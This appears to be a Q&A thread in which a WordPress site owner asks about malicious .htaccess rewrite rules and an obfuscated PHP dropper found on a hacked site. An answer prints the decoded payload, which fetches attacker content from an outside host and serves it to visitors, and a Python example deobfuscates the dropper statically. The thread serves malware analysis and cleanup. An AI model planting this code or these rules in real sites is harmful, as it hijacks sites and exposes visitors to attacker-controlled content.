php - What does this code mean? (Virus Looking)
I'm wondering if anyone can figure out what this code in PHP does.
I've removed it, but I'm curious how it got there and what it does.
I found it in one of my WordPress sites:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(emyiac-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/emyiacimwqkfv-.php?p=$2 [L]
    </IfModule>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(auyaix-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/auyaixfblclcc-.php?p=$2 [L]
    </IfModule>
And one of the files contains this:
<?php $twrgwh3="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";$kyikqj="\141";$symk1bfi="\x62\x61\x73";$ztmvjgx="\163\164";$yw51kl="fl1ymasdijxwq0bimmp2ifzh9z02quyy1vnwnidebtmhhb";$cbqlfy="\x67\x7a\151";$cbqlfy.="\156\x66";$kyikqj.="\163";$yw51kl.="gnxvymd1ftzkcz+9tdyrqtyacax1za5eqcdxejoefumkao";$symk1bfi.="\x65\66\x34";$ztmvjgx.="\162\137\x72";$ztmvjgx.="\157\x74";$cbqlfy.="\x6c\x61";$symk1bfi.="\x5f\x64\x65\143";$yw51kl.="tywqzqnjobmjwen2wfdrcqixwpxa/xvhhaaezqjkzastpl";$kyikqj.="\163\145";$cbqlfy.="\x74\x65";$symk1bfi.="\x6f\x64\145";$yw51kl.="w5ptsif1uagjhuiwnoimxqpa3pxwhtmtts1gjgnd==";$kyikqj.="\162\x74";$ztmvjgx.="\x31\x33";@$kyikqj($cbqlfy($symk1bfi($ztmvjgx($yw51kl))));?>
Since the question is "What does this code mean?", here is what the code boils down to.
If I were you, I'd start looking through the access log files for entries with ?p= included in the URL.
    <?php
    header('content-type: text/html; charset=utf-8');
    $p = 'p';
    // Remote host and path the script fetches content from
    $host = 'websys-nt.com';
    $path = '/wb0454545/';
    $srvr = $_SERVER['HTTP_HOST'].'/';

    // Visitor address, preferring client-supplied headers over REMOTE_ADDR
    function getrealip() {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
        return $ip;
    }

    // Only acts when the request carries ?p= (set by the rewrite rules)
    if (isset($_GET[$p])) {
        $r = getrealip();
        if (strpos($_SERVER["HTTP_USER_AGENT"], "ip: ") !== false)
            $r = substr($_SERVER["HTTP_USER_AGENT"], strpos($_SERVER["HTTP_USER_AGENT"], "ip: ") + 4);
        $param = $_GET[$p];
        // Static-looking names are passed through without the local host name
        if (strpos($param, '.js') !== false) {
            $ext = '.js'; $param = str_replace('.js', '', $param); $srvr = '';
        } else if (strpos($param, 'prokl-') !== false) {
            $ext = '.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-") + 6));
            $param = 'prokl'; $srvr = '';
        } else if (strpos($param, '.css') !== false) {
            $ext = '.css'; $param = str_replace('.css', '', $param); $srvr = '';
        } else if (strpos($param, '.gif') !== false) {
            $ext = '.gif'; $param = str_replace('.gif', '', $param); $srvr = '';
        } else if (strpos($param, '.htm') !== false) {
            $ext = '.htm'; $param = str_replace('.htm', '', $param); $srvr = '';
        } else if (strpos($param, '.jpg') !== false) {
            $ext = '.jpg'; $param = str_replace('.jpg', '', $param); $srvr = '';
        } else if (strpos($param, '.ico') !== false) {
            $ext = '.ico'; $param = str_replace('.ico', '', $param); $srvr = '';
        } else if (strpos($param, '.png') !== false) {
            $ext = '.png'; $param = str_replace('.png', '', $param); $srvr = '';
        } else {
            // As found in the sample: $rf is assigned but $ref is what gets sent
            $rf = $_SERVER['HTTP_REFERER'];
            $ext = '.php?ip='.$r.'&ref='.$ref;
        }
        $out = '';
        $buff = '';
        // Fetch the remote content with cURL, or a raw socket if cURL is unavailable
        if ($curl = curl_init()) {
            curl_setopt($curl, CURLOPT_URL, 'http://'.$host.$path.$srvr.$param.$ext);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
            $out = curl_exec($curl);
            curl_close($curl);
        } else {
            $fp = fsockopen($host, 80, $errno, $errstr, 30);
            if ($fp) {
                $out = "GET ".$path.$srvr.$param.$ext." HTTP/1.1\r\n";
                $out .= "host: ".$host."\r\n";
                $out .= "user-agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n";
                $out .= "connection: close\r\n\r\n";
                fwrite($fp, $out);
                while (!feof($fp)) {
                    $buff .= fgets($fp, 128);
                }
                $result = explode("\r\n\r\n", $buff, 2);
                $out = $result[1];
                fclose($fp);
            }
        }
        // Whatever the remote host returned is served to the visitor
        echo $out;
        exit;
    }
    ?>
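A decoded form like the one in the answer can be recovered statically, without ever running the dropper. The following is an added example, not part of the original question or answer: it replays the escaped string assignments to reveal the hidden function names, then undoes the decoding layers in Python. The helper names are hypothetical, and the sample keeps the dropper's name-building statements but replaces its long payload string with the placeholder "PAYLOAD".

```python
import base64, codecs, re, zlib

# Constructed sample: the dropper's name-building statements as quoted above,
# with the long payload string cut down to the placeholder "PAYLOAD".
SAMPLE = r'''$kyikqj="\141";$symk1bfi="\x62\x61\x73";$ztmvjgx="\163\164";$yw51kl="PAYLOAD";$cbqlfy="\x67\x7a\151";$cbqlfy.="\156\x66";$kyikqj.="\163";$symk1bfi.="\x65\66\x34";$ztmvjgx.="\162\137\x72";$ztmvjgx.="\157\x74";$cbqlfy.="\x6c\x61";$symk1bfi.="\x5f\x64\x65\143";$kyikqj.="\163\145";$cbqlfy.="\x74\x65";$symk1bfi.="\x6f\x64\145";$kyikqj.="\162\x74";$ztmvjgx.="\x31\x33";@$kyikqj($cbqlfy($symk1bfi($ztmvjgx($yw51kl))));'''

ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
ASSIGN = re.compile(r'\$(\w+)\s*(\.?=)\s*"((?:[^"\\]|\\.)*)"\s*;')
CALL = re.compile(r'\$(\w+)\s*\(')

# Python equivalents of the PHP decoding layers this dropper stacks up.
DECODERS = {
    "str_rot13": lambda b: codecs.encode(b.decode("ascii"), "rot13").encode("ascii"),
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE, no zlib header
}

def php_unescape(s):
    """Expand the \\xHH and \\NNN escapes of a PHP double-quoted string."""
    return ESC.sub(lambda m: chr(int(m.group(1), 16) if m.group(1)
                                 else int(m.group(2), 8)), s)

def resolve_strings(src):
    """Replay each $v="..." and $v.="..." statement; return the final values."""
    values = {}
    for name, op, raw in ASSIGN.findall(src):
        text = php_unescape(raw)
        values[name] = values.get(name, "") + text if op == ".=" else text
    return values

def call_chain(src, values):
    """Function names hidden in @$a($b($c(...))), outermost first."""
    return [values[v] for v in CALL.findall(src) if v in values]

def unwrap(blob, chain):
    """Undo the decoding layers innermost-first without executing anything."""
    data = blob.encode("ascii")
    for fn in reversed(chain):
        if fn not in DECODERS:  # assert/eval etc.: the execution sink, stop here
            break
        data = DECODERS[fn](data)
    return data.decode("utf-8", "replace")

if __name__ == "__main__":
    names = call_chain(SAMPLE, resolve_strings(SAMPLE))
    print(" <- ".join(names))  # data flows right to left into the first name
```

Passing the intact payload string from an infected file to `unwrap` returns the hidden PHP source as text for review.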